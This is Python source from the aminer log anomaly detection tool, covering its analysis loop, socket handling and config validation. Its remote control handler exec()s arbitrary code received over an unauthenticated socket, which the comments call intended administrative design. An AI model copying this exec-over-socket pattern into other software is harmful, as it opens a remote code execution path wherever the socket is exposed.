self.analysis_context.build_analysis_pipeline() if self.analysis_context.atomizer_factory is None: msg = 'build_analysis_pipeline() did not initialize atomizer_factory, terminating' print('FATAL: ' + msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).critical(msg) return 1 real_time_triggered_components = self.analysis_context.real_time_triggered_components analysis_time_triggered_components = self.analysis_context.analysis_time_triggered_components max_memory_mb = self.analysis_context.aminer_config.config_properties.get(KEY_RESOURCES_MAX_MEMORY_USAGE, None) if max_memory_mb is not None: try: max_memory_mb = int(max_memory_mb) resource.setrlimit(resource.RLIMIT_AS, (max_memory_mb * 1024 * 1024, resource.RLIM_INFINITY)) logging.getLogger(DEBUG_LOG_NAME).debug('set max memory limit to %d MB.', max_memory_mb) except ValueError: msg = f"{KEY_RESOURCES_MAX_MEMORY_USAGE} must be an integer, terminating" print('FATAL: ' + msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).critical(msg) return 1 # Load continuation data for last known log streams. The loaded data has to be a dictionary with repositioning information for # each stream. The data is used only when creating the first stream with that name. self.repositioning_data_dict = PersistenceUtil.load_json(self.persistence_file_name) if self.repositioning_data_dict is None: self.repositioning_data_dict = {} # A list of LogStreams where handleStream() blocked due to downstream not being able to consume the data yet. blocked_log_streams = [] # Always start when number is None. 
next_real_time_trigger_time = None next_analysis_time_trigger_time = None next_backup_time_trigger_time = None log_stat_period = self.analysis_context.aminer_config.config_properties.get( KEY_LOG_STAT_PERIOD, DEFAULT_STAT_PERIOD) next_statistics_log_time = time.time() + log_stat_period delayed_return_status = 0 while self.run_analysis_loop_flag: # Build the list of inputs to select for anew each time: the LogStream file descriptors may change due to rollover. input_select_fd_list = [] output_select_fd_list = [] for fd_handler_object in self.tracked_fds_dict.values(): if isinstance(fd_handler_object, LogStream): stream_fd = fd_handler_object.get_current_fd() if stream_fd < 0: continue input_select_fd_list.append(stream_fd) elif isinstance(fd_handler_object, AnalysisChildRemoteControlHandler): fd_handler_object.add_select_fds(input_select_fd_list, output_select_fd_list) else: # This has to be a socket, just add the file descriptor. input_select_fd_list.append(fd_handler_object.fileno()) # Loop over the list in reverse order to avoid skipping elements in remove. if not suspended_flag: for log_stream in reversed(blocked_log_streams): current_stream_fd = log_stream.handle_stream() if current_stream_fd >= 0: self.tracked_fds_dict[current_stream_fd] = log_stream input_select_fd_list.append(current_stream_fd) blocked_log_streams.remove(log_stream) read_list = None write_list = None try: (read_list, write_list, _except_list) = select.select(input_select_fd_list, output_select_fd_list, [], 1) except select.error as select_error: # Interrupting signals, e.g. for shutdown are OK. if select_error[0] == errno.EINTR: continue msg = f"Unexpected select result {str(select_error)}" print(msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).error(msg) delayed_return_status = 1 break for read_fd in read_list: fd_handler_object = self.tracked_fds_dict[read_fd] if isinstance(fd_handler_object, LogStream): # Handle this LogStream. 
Only when downstream processing blocks, add the stream to the blocked stream list. handle_result = fd_handler_object.handle_stream() if handle_result < 0: # No need to care if current internal file descriptor in LogStream has changed in handleStream(), # this will be handled when unblocking. del self.tracked_fds_dict[read_fd] blocked_log_streams.append(fd_handler_object) elif handle_result != read_fd: # The current fd has changed, update the tracking list. del self.tracked_fds_dict[read_fd] self.tracked_fds_dict[handle_result] = fd_handler_object continue if isinstance(fd_handler_object, AnalysisChildRemoteControlHandler): try: fd_handler_object.do_receive() except ConnectionError as receiveException: msg = f"Unclean termination of remote control: {str(receiveException)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) print(msg, file=sys.stderr) if fd_handler_object.is_dead(): logging.getLogger(DEBUG_LOG_NAME).debug('Deleting fd %s from tracked_fds_dict.', str(read_fd)) del self.tracked_fds_dict[read_fd] # Reading is only attempted when output buffer was already flushed. Try processing the next request to fill the output # buffer for next round. else: fd_handler_object.do_process(self.analysis_context) continue if fd_handler_object == self.master_control_socket: self.handle_master_control_socket_receive() continue if fd_handler_object == self.remote_control_socket: # We received a remote connection, accept it unconditionally. Users should make sure, that they do not exhaust # resources by hogging open connections. (control_client_socket, _remote_address) = self.remote_control_socket.accept() # Keep track of information received via this remote control socket. 
remote_control_handler = AnalysisChildRemoteControlHandler(control_client_socket) self.tracked_fds_dict[control_client_socket.fileno()] = remote_control_handler continue msg = f"Unhandled object type {type(fd_handler_object)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) for write_fd in write_list: fd_handler_object = self.tracked_fds_dict[write_fd] if isinstance(fd_handler_object, AnalysisChildRemoteControlHandler): buffer_flushed_flag = False try: buffer_flushed_flag = fd_handler_object.do_send() except OSError as sendError: msg = f"Error at sending data via remote control: {str(sendError)}" print(msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).error(msg) try: fd_handler_object.terminate() except ConnectionError as terminateException: msg = f"Unclean termination of remote control: {str(terminateException)}" print(msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).error(msg) if buffer_flushed_flag: fd_handler_object.do_process(self.analysis_context) if fd_handler_object.is_dead(): del self.tracked_fds_dict[write_fd] continue msg = f"Unhandled object type {type(fd_handler_object)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Handle the real time events. real_time = time.time() if next_real_time_trigger_time is None or real_time >= next_real_time_trigger_time: next_trigger_offset = 3600 for component in real_time_triggered_components: if not suspended_flag: next_trigger_request = component.do_timer(real_time) next_trigger_offset = min(next_trigger_offset, next_trigger_request) next_real_time_trigger_time = real_time + next_trigger_offset if real_time >= next_statistics_log_time: next_statistics_log_time = real_time + log_stat_period logging.getLogger(DEBUG_LOG_NAME).debug('Statistics logs are written..') # log the statistics for every component. 
for component_name in self.analysis_context.registered_components_by_name: component = self.analysis_context.registered_components_by_name[component_name] component.log_statistics(component_name) # Handle the analysis time events. The analysis time will be different when an analysis time component is registered. analysis_time = self.analysis_context.analysis_time if analysis_time is None: analysis_time = real_time if next_analysis_time_trigger_time is None or analysis_time >= next_analysis_time_trigger_time: next_trigger_offset = 3600 for component in analysis_time_triggered_components: if not suspended_flag: next_trigger_request = component.do_timer(real_time) next_trigger_offset = min(next_trigger_offset, next_trigger_request) next_analysis_time_trigger_time = analysis_time + next_trigger_offset # backup the persistence data. backup_time = time.time() backup_time_str = datetime.fromtimestamp(backup_time).strftime('%Y-%m-%d-%H-%M-%S') persistence_dir = self.analysis_context.aminer_config.config_properties.get( KEY_PERSISTENCE_DIR, DEFAULT_PERSISTENCE_DIR) persistence_dir = persistence_dir.rstrip('/') backup_path = persistence_dir + '/backup/' backup_path_with_date = os.path.join(backup_path, backup_time_str) if next_backup_time_trigger_time is None or backup_time >= next_backup_time_trigger_time: next_trigger_offset = 3600 * 24 if next_backup_time_trigger_time is not None: shutil.copytree(persistence_dir, backup_path_with_date, ignore=shutil.ignore_patterns('backup*')) logging.getLogger(DEBUG_LOG_NAME).info('Persistence backup created in %s.', backup_path_with_date) next_backup_time_trigger_time = backup_time + next_trigger_offset if len(self.tracked_fds_dict) == 1 and self.offline_mode: self.run_analysis_loop_flag = False # Analysis loop is only left on shutdown. Try to persist everything and leave. 
PersistenceUtil.persist_all()
        # Shutdown path: flush all persistence, then close every tracked socket/stream and the event handler outputs.
        for sock in self.tracked_fds_dict.values():
            sock.close()
        self.analysis_context.close_event_handler_streams(self.analysis_context.atomizer_factory.event_handler_list)
        return delayed_return_status

    def handle_master_control_socket_receive(self):
        """
        Receive information from the parent process via the master control socket.

        The parent passes a file descriptor together with a type tag and an annotation (both bytes). A b'logstream'
        descriptor is wrapped into a FileLogDataResource (annotation b'file://...') or a UnixSocketLogDataResource
        (annotation b'unix://...'), switched to non-blocking mode and attached to the LogStream registered under its
        resource name. A b'remotecontrol' descriptor becomes the remote control socket tracked in tracked_fds_dict.
        Any other annotation scheme or type tag is treated as a fatal protocol error.

        This method may only be invoked when receiving is guaranteed to be nonblocking and to return data.

        @raises Exception on an unknown annotation scheme, on a second remote control socket or on an unknown type tag.
        """
        # We cannot fail with None here as the socket was in the readList.
        (received_fd, received_type_info, annotation_data) = SecureOSFunctions.receive_annoted_file_descriptor(self.master_control_socket)
        if received_type_info == b'logstream':
            # Stored read positions from the last persistence run are consumed once and then removed.
            repositioning_data = self.repositioning_data_dict.get(annotation_data, None)
            if repositioning_data is not None:
                del self.repositioning_data_dict[annotation_data]
            res = None
            if annotation_data.startswith(b'file://'):
                from aminer.input.LogStream import FileLogDataResource
                res = FileLogDataResource(annotation_data, received_fd, repositioning_data=repositioning_data)
            elif annotation_data.startswith(b'unix://'):
                from aminer.input.LogStream import UnixSocketLogDataResource
                res = UnixSocketLogDataResource(annotation_data, received_fd)
            else:
                msg = 'Filedescriptor of unknown type received'
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise Exception(msg)
            # Make fd nonblocking.
            fd_flags = fcntl.fcntl(res.get_file_descriptor(), fcntl.F_GETFL)
            fcntl.fcntl(res.get_file_descriptor(), fcntl.F_SETFL, fd_flags | os.O_NONBLOCK)
            log_stream = self.log_streams_by_name.get(res.get_resource_name())
            if log_stream is None:
                stream_atomizer = self.analysis_context.atomizer_factory.get_atomizer_for_resource(res.get_resource_name())
                log_stream = LogStream(res, stream_atomizer)
                self.tracked_fds_dict[res.get_file_descriptor()] = log_stream
                self.log_streams_by_name[res.get_resource_name()] = log_stream
            else:
                # A resource name seen before: queue the new resource behind the current one of that stream
                # (presumably the rotated-file case; confirm against LogStream.add_next_resource).
                log_stream.add_next_resource(res)
        elif received_type_info == b'remotecontrol':
            if self.remote_control_socket is not None:
                msg = 'Received another remote control socket: multiple remote control not supported (yet?).'
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise Exception(msg)
            # socket.fromfd() duplicates the descriptor, so the received one is closed immediately to avoid a leak.
            self.remote_control_socket = socket.fromfd(received_fd, socket.AF_UNIX, socket.SOCK_STREAM, 0)
            os.close(received_fd)
            self.tracked_fds_dict[self.remote_control_socket.fileno()] = self.remote_control_socket
        else:
            msg = f"Unhandled type info on received fd: {repr(received_type_info)}"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)

    def do_timer(self, trigger_time):
        """
        Perform trigger actions and to determine the time for next invocation.

        The caller may decide to invoke this method earlier than requested during the previous call. Classes implementing
        this method have to handle such cases. Each class should try to limit the time spent in this method as it might delay
        trigger signals to other components. For extensive computational work or IO, a separate thread should be used.

        @param trigger_time the time this trigger is invoked. This might be the current real time when invoked from real
        time timers or the forensic log timescale time value.
        @return the number of seconds when next invocation of this trigger is required.
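"""
        delta = self.next_persist_time - trigger_time
        if delta <= 0:
            # Collect the current read position of every stream and persist it so a restart can resume from there.
            self.repositioning_data_dict = {}
            for log_stream_name, log_stream in self.log_streams_by_name.items():
                repositioning_data = log_stream.get_repositioning_data()
                if repositioning_data is not None:
                    self.repositioning_data_dict[log_stream_name] = repositioning_data
            PersistenceUtil.store_json(self.persistence_file_name, self.repositioning_data_dict)
            delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
            self.next_persist_time = trigger_time + delta
            logging.getLogger(DEBUG_LOG_NAME).debug('Repositioning data was persisted.')
        return delta


class AnalysisChildRemoteControlHandler:
    """
    This class stores information about one open remote control connection.

    The handler can be in 3 different states:
    * receive request: the control request was not completely received. The main process may use select() to wait for
      input data without blocking or polling.
    * execute: the request is complete and is currently under execution. In that mode all other aminer analysis activity
      is blocked.
    * respond: send back results from execution.

    All sent and received control packets have following common structure:
    * Total length in bytes (4 bytes, unsigned, network byte order), header included. Accepted values satisfy
      min_control_packet_size <= length < max_control_packet_size.
    * Type code (4 bytes)
    * Data

    The handler processes following types:
    * Execute request ('EEEE'): Data is loaded as json artefact containing a list with two elements. The first one is the
      Python code to be executed. The second one is available within the execution namespace as 'remote_control_data'.

    The handler produces following requests:
    * Execution response ('RRRR'): The response contains a json artefact with a two element list. The first element is
      the exception message and traceback as string if an error has occured, null otherwise. The second one is the
      content of 'remoteControlResponse' from the Python execution namespace, possibly combined with the output collected
      by the helper methods.

    Security: an execute request runs arbitrary Python inside the analysis child (see do_process). Nothing in this handler
    authenticates or confines the peer, so access control has to be enforced on the remote control socket itself.

    Method naming:
    * do...(): Those methods perform an action consuming input or output buffer data.
    * may...(): Those methods return true if it would make sense to call a do...() method with the same name.
    * put...(): Those methods put a request on the buffers.
    """

    # Upper bound for a whole packet, header included. The length preamble is a 32 bit unsigned value, so every length
    # read from the wire is already below this bound and the check in do_get() can only reject lengths shorter than the
    # header. A peer may therefore announce a packet of almost 4 GiB that is buffered until it completes; this is
    # acceptable only because the socket is the trust boundary (the same peer may execute code anyway).
    max_control_packet_size = 1 << 32
    # Smallest well-formed packet: 4 byte length preamble plus 4 byte type code, no data.
    min_control_packet_size = 8

    def __init__(self, control_client_socket):
        """
        Create the handler for one accepted remote control connection.

        @param control_client_socket the connected socket. The handler keeps the object to close it in terminate() and
        uses its raw file descriptor for os.read()/os.write().
        """
        self.control_client_socket = control_client_socket
        self.remote_control_fd = control_client_socket.fileno()
        self.input_buffer = b''
        self.output_buffer = b''

    def may_receive(self):
        """Check if this handler may receive more requests, i.e. no response is still waiting to be sent."""
        return len(self.output_buffer) == 0

    @staticmethod
    def _build_exec_namespace(analysis_context, methods, remote_control_data):
        """
        Build the locals namespace handed to exec() for an execute request.

        It exposes the analysis context, the request data, the bound helper methods of an
        AminerRemoteControlExecutionMethods instance and the analysis component classes under their usual names.

        @param analysis_context the AnalysisContext of this child.
        @param methods the AminerRemoteControlExecutionMethods instance collecting helper output.
        @param remote_control_data the decoded second element of the request.
        @return a fresh dict usable as exec() locals.
        """
        from aminer.analysis import EnhancedNewMatchPathValueComboDetector, EventCorrelationDetector, EventTypeDetector, \
            EventFrequencyDetector, EventSequenceDetector, HistogramAnalysis, MatchFilter, MatchValueAverageChangeDetector, \
            MatchValueStreamWriter, MissingMatchPathValueDetector, NewMatchIdValueComboDetector, NewMatchPathDetector, \
            NewMatchPathValueComboDetector, NewMatchPathValueDetector, ParserCount, Rules, TimeCorrelationDetector, \
            TimeCorrelationViolationDetector, TimestampCorrectionFilters, TimestampsUnsortedDetector, VariableTypeDetector, \
            AllowlistViolationDetector, EventCountClusterDetector
        return {
            'analysis_context': analysis_context,
            'remote_control_data': remote_control_data,
            'print_current_config': methods.print_current_config,
            'print_config_property': methods.print_config_property,
            'print_attribute_of_registered_analysis_component': methods.print_attribute_of_registered_analysis_component,
            'change_config_property': methods.change_config_property,
            'change_attribute_of_registered_analysis_component': methods.change_attribute_of_registered_analysis_component,
            'rename_registered_analysis_component': methods.rename_registered_analysis_component,
            'add_handler_to_atom_filter_and_register_analysis_component':
                methods.add_handler_to_atom_filter_and_register_analysis_component,
            'save_current_config': methods.save_current_config,
            'allowlist_event_in_component': methods.allowlist_event_in_component,
            'blocklist_event_in_component': methods.blocklist_event_in_component,
            'print_persistency_event_in_component': methods.print_persistency_event_in_component,
            'add_to_persistency_event_in_component': methods.add_to_persistency_event_in_component,
            'remove_from_persistency_event_in_component': methods.remove_from_persistency_event_in_component,
            'dump_events_from_history': methods.dump_events_from_history,
            'ignore_events_from_history': methods.ignore_events_from_history,
            'list_events_from_history': methods.list_events_from_history,
            'allowlist_events_from_history': methods.allowlist_events_from_history,
            'persist_all': methods.persist_all,
            'list_backups': methods.list_backups,
            'create_backup': methods.create_backup,
            'reopen_event_handler_streams': methods.reopen_event_handler_streams,
            'EnhancedNewMatchPathValueComboDetector': EnhancedNewMatchPathValueComboDetector.EnhancedNewMatchPathValueComboDetector,
            'EventCorrelationDetector': EventCorrelationDetector.EventCorrelationDetector,
            'EventCountClusterDetector': EventCountClusterDetector.EventCountClusterDetector,
            'EventTypeDetector': EventTypeDetector.EventTypeDetector,
            'EventFrequencyDetector': EventFrequencyDetector.EventFrequencyDetector,
            'EventSequenceDetector': EventSequenceDetector.EventSequenceDetector,
            'HistogramAnalysis': HistogramAnalysis.HistogramAnalysis,
            'PathDependentHistogramAnalysis': HistogramAnalysis.PathDependentHistogramAnalysis,
            'MatchFilter': MatchFilter.MatchFilter,
            'MatchValueAverageChangeDetector': MatchValueAverageChangeDetector.MatchValueAverageChangeDetector,
            'MatchValueStreamWriter': MatchValueStreamWriter.MatchValueStreamWriter,
            'MissingMatchPathValueDetector': MissingMatchPathValueDetector.MissingMatchPathValueDetector,
            'NewMatchIdValueComboDetector': NewMatchIdValueComboDetector.NewMatchIdValueComboDetector,
            'NewMatchPathDetector': NewMatchPathDetector.NewMatchPathDetector,
            'NewMatchPathValueComboDetector': NewMatchPathValueComboDetector.NewMatchPathValueComboDetector,
            'NewMatchPathValueDetector': NewMatchPathValueDetector.NewMatchPathValueDetector,
            'ParserCount': ParserCount.ParserCount,
            'Rules': Rules,
            'TimeCorrelationDetector': TimeCorrelationDetector.TimeCorrelationDetector,
            'TimeCorrelationViolationDetector': TimeCorrelationViolationDetector.TimeCorrelationViolationDetector,
            'SimpleMonotonicTimestampAdjust': TimestampCorrectionFilters.SimpleMonotonicTimestampAdjust,
            'TimestampsUnsortedDetector': TimestampsUnsortedDetector.TimestampsUnsortedDetector,
            'VariableTypeDetector': VariableTypeDetector.VariableTypeDetector,
            'AllowlistViolationDetector': AllowlistViolationDetector.AllowlistViolationDetector
        }

    def do_process(self, analysis_context):
        """
        Process the next request, if any.

        Only execute requests ('EEEE') are understood. The code strings 'suspend'/'activate' (also with '_aminer' and
        '()' suffixes) are handled directly by toggling the module level suspended_flag; anything else is run with
        exec(). The outcome is queued on the output buffer as an 'RRRR' packet holding the json list
        [traceback_or_null, response] (see _pack_response for the size limit handling).

        @param analysis_context the AnalysisContext exposed to the executed code as 'analysis_context'.
        @raises Exception for a malformed packet (see do_get) or an unknown request type. Errors raised while decoding or
        executing the request are caught and reported back to the peer instead.
        """
        # skipcq: PYL-W0603
        global suspended_flag
        request_data = self.do_get()
        if request_data is None:
            return
        request_type = request_data[4:8]
        if request_type != b'EEEE':
            msg = f"Invalid request type {repr(request_type)}"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)

        json_remote_control_response = None
        exception_data = None
        try:
            json_request_data = json.loads(request_data[8:].decode())
            json_request_data = JsonUtil.decode_object(json_request_data)
            if (json_request_data is None) or (not isinstance(json_request_data, list)) or (len(json_request_data) != 2):
                msg = 'Invalid request data'
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise Exception(msg)
            code, remote_control_data = json_request_data
            # JsonUtil.decode_object yields bytes for strings. The code has to be text for exec(); string data (also
            # inside a list) is presented as text as well. Other data types (numbers, dicts, ...) are passed through
            # unchanged instead of failing on a missing .decode() as before.
            if code and isinstance(code, bytes):
                code = code.decode()
            if remote_control_data:
                if isinstance(remote_control_data, list):
                    remote_control_data = [item.decode() if isinstance(item, bytes) else item for item in remote_control_data]
                elif isinstance(remote_control_data, bytes):
                    remote_control_data = remote_control_data.decode()
            methods = AminerRemoteControlExecutionMethods()
            exec_locals = self._build_exec_namespace(analysis_context, methods, remote_control_data)
            logging.getLogger(REMOTE_CONTROL_LOG_NAME).log(15, code)
            logging.getLogger(DEBUG_LOG_NAME).debug('Remote control: %s', code)
            if code in ('suspend_aminer()', 'suspend_aminer', 'suspend'):
                suspended_flag = True
                msg = methods.REMOTE_CONTROL_RESPONSE + 'OK. aminer is suspended now.'
                json_remote_control_response = json.dumps(msg)
                logging.getLogger(DEBUG_LOG_NAME).info(msg)
            elif code in ('activate_aminer()', 'activate_aminer', 'activate'):
                suspended_flag = False
                msg = methods.REMOTE_CONTROL_RESPONSE + 'OK. aminer is activated now.'
                json_remote_control_response = json.dumps(msg)
                logging.getLogger(DEBUG_LOG_NAME).info(msg)
            else:
                # Removing __builtins__ does not confine the code: exec_locals hands it analysis_context and the detector
                # classes, from which the full interpreter is reachable. This is by design (administrative interface);
                # the protection is who may connect to the socket, not this namespace.
                # skipcq: PYL-W0122
                exec(code, {'__builtins__': None}, exec_locals)
                script_response = exec_locals.get('remoteControlResponse')
                method_output = methods.REMOTE_CONTROL_RESPONSE
                if method_output == '':
                    method_output = None
                if script_response is None:
                    json_remote_control_response = json.dumps(method_output)
                elif method_output is None:
                    # Only the script set a response. The previous code concatenated it with None here and thereby
                    # turned every plain 'remoteControlResponse = ...' into a TypeError report.
                    json_remote_control_response = json.dumps(script_response)
                else:
                    json_remote_control_response = json.dumps(script_response + method_output)
        except BaseException:
            # Everything, including errors raised by the executed code, is reported back to the peer as traceback text.
            exception_data = traceback.format_exc()
            logging.getLogger(DEBUG_LOG_NAME).debug('Remote control exception data: %s', str(exception_data))
        # This is little dirty but avoids having to pass over remoteControlResponse dumping again.
        if json_remote_control_response is None:
            json_remote_control_response = 'null'
        json_response = f"[{json.dumps(exception_data)}, {json_remote_control_response}]"
        self.output_buffer += self._pack_response(json_response)

    def _pack_response(self, json_response):
        """
        Frame a json response string as an 'RRRR' packet, truncating it when it would exceed max_control_packet_size.

        An oversized response is replaced by a one element json list holding a synthetic 'Response too large' exception
        text followed by as much of the original json string as still fits; the cut position is found by bisection on the
        included length.

        @param json_response the complete response as json text.
        @return the packet bytes: length preamble, type code and payload.
        """
        payload_limit = self.max_control_packet_size - 8
        if len(json_response) > payload_limit:
            max_include_size = len(json_response)
            min_include_size = 0
            min_include_response_data = None
            while True:
                test_size = (max_include_size + min_include_size) >> 1
                if test_size == min_include_size:
                    break
                # The old code formatted a (prefix, None) tuple here, leaking "('...', None)" into the message.
                emergency_response_data = json.dumps(
                    [f"Exception: Response too large\nPartial response data: {json_response[:test_size]}..."])
                if len(emergency_response_data) > payload_limit:
                    max_include_size = test_size - 1
                else:
                    min_include_size = test_size
                    min_include_response_data = emergency_response_data
            if min_include_response_data is None:
                # Not even an empty prefix fits (only possible with a tiny max_control_packet_size); still answer.
                min_include_response_data = json.dumps(["Exception: Response too large"])
            json_response = min_include_response_data
        # Now size is OK, send the data
        payload = json_response.encode()
        return struct.pack("!I", len(payload) + 8) + b'RRRR' + payload

    def _is_invalid_length(self, request_length):
        """Return True if a length preamble can never describe a well-formed packet (below the header size or at/above the cap)."""
        return request_length < self.min_control_packet_size or request_length >= self.max_control_packet_size

    def may_get(self):
        """
        Check if a call to do_get would make sense.

        @return True if the input buffer already contains a complete wellformed packet or definitely malformed one.
        """
        if len(self.input_buffer) < 4:
            return False
        request_length = struct.unpack("!I", self.input_buffer[:4])[0]
        if self._is_invalid_length(request_length):
            return True
        return request_length <= len(self.input_buffer)

    def do_get(self):
        """
        Get the next packet from the input buffer and remove it.

        @return the packet data including the length preamble or None when request not yet complete.
        @raises Exception when the length preamble is shorter than the 8 byte header or not below max_control_packet_size.
        The unsigned "!I" preamble can never be negative, so the former "< 0" check was dead; a header-only minimum
        replaces it so that a truncated packet is rejected here instead of as an empty request type in do_process().
        """
        if len(self.input_buffer) < 4:
            return None
        request_length = struct.unpack("!I", self.input_buffer[:4])[0]
        if self._is_invalid_length(request_length):
            # ":x" so that the value really is hexadecimal after the "0x" prefix.
            msg = f"Invalid length value 0x{request_length:x} in malformed request starting with b64:" \
                  f"{base64.b64encode(self.input_buffer[:60])}"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if request_length > len(self.input_buffer):
            return None
        request_data = self.input_buffer[:request_length]
        self.input_buffer = self.input_buffer[request_length:]
        return request_data

    def do_receive(self):
        """
        Receive data from the remote side and add it to the input buffer.

        This method call expects to read at least one byte of data. A zero byte read indicates EOF and will cause normal
        handler termination when all input and output buffers are empty. Any other state or error causes handler
        termination before reporting the error.

        @return True if read was successful, False if EOF is reached without reading any data and all buffers are empty
        (the old code documented this return value but never returned it).
        @throws Exception when unexpected errors occured while receiving or shuting down the connection.
        """
        data = os.read(self.remote_control_fd, 1 << 16)
        if not data:
            self.terminate()
            return False
        self.input_buffer += data
        return True

    def do_send(self):
        """
        Send data from the output buffer to the remote side.

        @return True if output buffer was emptied.
        """
        send_length = os.write(self.remote_control_fd, self.output_buffer)
        if send_length == len(self.output_buffer):
            self.output_buffer = b''
            return True
        # Partial write: keep the rest for the next writable select() round.
        self.output_buffer = self.output_buffer[send_length:]
        return False

    def put_request(self, request_type, request_data):
        """
        Add a request of given type to the send queue.

        @param request_type is a byte string denoting the type of the request. Currently only 'EEEE' is supported.
        @param request_data is a byte string denoting the content of the request.
        @raises Exception when the type is not a 4 byte string, the data is not bytes or the packet would exceed
        max_control_packet_size.
        """
        if not isinstance(request_type, bytes):
            msg = 'Request type is not a byte string'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if len(request_type) != 4:
            msg = 'Request type has to be 4 bytes long'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if not isinstance(request_data, bytes):
            msg = 'Request data is not a byte string'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if len(request_data) + 8 > self.max_control_packet_size:
            msg = 'Data too large to fit into single packet'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        self.output_buffer += struct.pack("!I", len(request_data) + 8) + request_type + request_data

    def put_execute_request(self, remote_control_code, remote_control_data):
        """
        Add an execute request to the send queue.

        @param remote_control_code the Python code (str or bytes) the receiving side shall run.
        @param remote_control_data arbitrary json-encodable data made available to that code as 'remote_control_data'.
        """
        remote_control_data = json.dumps([JsonUtil.encode_object(remote_control_code), JsonUtil.encode_object(remote_control_data)])
        self.put_request(b'EEEE', remote_control_data.encode())

    def add_select_fds(self, input_select_fd_list, output_select_fd_list):
        """
        Update the file descriptor lists for selecting on read and write file descriptors.

        While a response is pending the descriptor is only registered for writing, so no further request is read
        before the previous answer went out.
        """
        if self.output_buffer:
            output_select_fd_list.append(self.remote_control_fd)
        else:
            input_select_fd_list.append(self.remote_control_fd)

    def terminate(self):
        """
        End this remote control session.

        @raises Exception after closing the socket when unprocessed input or unsent output was still buffered.
        """
        self.control_client_socket.close()
        # Avoid accidential reuse.
        self.control_client_socket = None
        self.remote_control_fd = -1
        if self.input_buffer or self.output_buffer:
            msg = 'Unhandled input data'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)

    def is_dead(self):
        """Check if this remote control connection is already dead."""
        return self.remote_control_fd == -1
logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/ConfigValidator.py000066400000000000000000000224201437606560100326340ustar00rootroot00000000000000
import sys
import os
import logging
from cerberus import Validator
from cerberus import TypeDefinition


class ParserModelType:
    """Defines a type for parser classes."""

    name = None
    is_model = False
    func = None

    def __init__(self, name):
        self.name = name
        if name.endswith("ModelElement"):
            self.is_model = True
            # Classes must be imported from the right modules. Some class names do not match the module name and need to be set explicitly.
            module = "aminer.parsing"
            # NOTE(review): this branch is only entered for names ending in "ModelElement", so the DebugMatchContext
            # case below is unreachable here; if it ever becomes reachable it must be an elif of the next test, otherwise
            # ".DebugMatchContext" is appended a second time.
            if name == "DebugMatchContext":
                module += ".MatchContext"
            if name == "MultiLocaleDateTimeModelElement":
                module += ".DateTimeModelElement"
            else:
                module += "."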
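+ name
            self.func = getattr(__import__(module, fromlist=[name]), name)
        else:
            self.is_model = False
            try:
                # A plain name is a python module on sys.path providing get_model(). Both this import and the yaml fallback
                # below load whatever the configuration names, so the configuration file itself has to be trusted.
                self.func = __import__(name).get_model
            except (AttributeError, ImportError) as e:
                ymlext = ['.yml', '.YAML', '.YML', '.yaml']
                module = None
                # The first match in sys.path order wins. The previous inner-loop-only break let a later directory
                # override an earlier match.
                for path in sys.path:
                    for extension in ymlext:
                        abs_path = os.path.join(path, name + extension)
                        if os.path.exists(abs_path):
                            module = abs_path
                            break
                    if module is not None:
                        break
                if module is None:
                    raise e
                import yaml
                import copy
                from aminer.AminerConfig import DEBUG_LOG_NAME
                from aminer.YamlConfig import filter_config_errors, build_parsing_model
                with open(module) as yamlfile:  # skipcq: PTC-W6004
                    try:
                        # safe_load: a parser definition must not be able to instantiate arbitrary python objects.
                        yaml_data = yaml.safe_load(yamlfile)
                    except yaml.YAMLError as exception:
                        logging.getLogger(DEBUG_LOG_NAME).error(exception)
                        raise exception
                # The schema files are python dict literals shipped inside the package directory; eval() here runs
                # installed package code, not configuration input.
                with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/normalisation/ParserNormalisationSchema.py', 'r') as sma:
                    # skipcq: PYL-W0123
                    parser_normalisation_schema = eval(sma.read())
                with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/validation/ParserValidationSchema.py', 'r') as sma:
                    # skipcq: PYL-W0123
                    parser_validation_schema = eval(sma.read())
                normalisation_schema = {**parser_normalisation_schema}
                validation_schema = {**parser_validation_schema}
                v = ConfigValidator(validation_schema)
                if not v.validate(yaml_data, validation_schema):
                    filtered_errors = copy.deepcopy(v.errors)
                    filter_config_errors(filtered_errors, 'Parser', v.errors, parser_validation_schema)
                    # Same treatment as YamlConfig.load_yaml(): a parser file failing strict validation is a configuration
                    # error. Previously the filtered errors were computed and then dropped, so a rejected file could still
                    # pass the less strict normalisation step below and be used.
                    logging.getLogger(DEBUG_LOG_NAME).error(filtered_errors)
                    raise ValueError(f'Config-Error: {filtered_errors}')
                v = NormalisationValidator(normalisation_schema)
                if not v.validate(yaml_data, normalisation_schema):
                    logging.getLogger(DEBUG_LOG_NAME).error(v.errors)
                    raise ValueError(v.errors)
                yaml_data = v.normalized(yaml_data)
                self.func = build_parsing_model(yaml_data)
                if callable(self.func):
                    self.func = self.func()

    def __str__(self):
        return self.name


class AnalysisType:
    """Defines a type for analysis classes."""

    name = None
    func = None

    def __init__(self, name):
        self.name = name
        # Classes must be imported from the right modules. Some class names do not match the module name and need to be set explicitly.
        module = "aminer.analysis"
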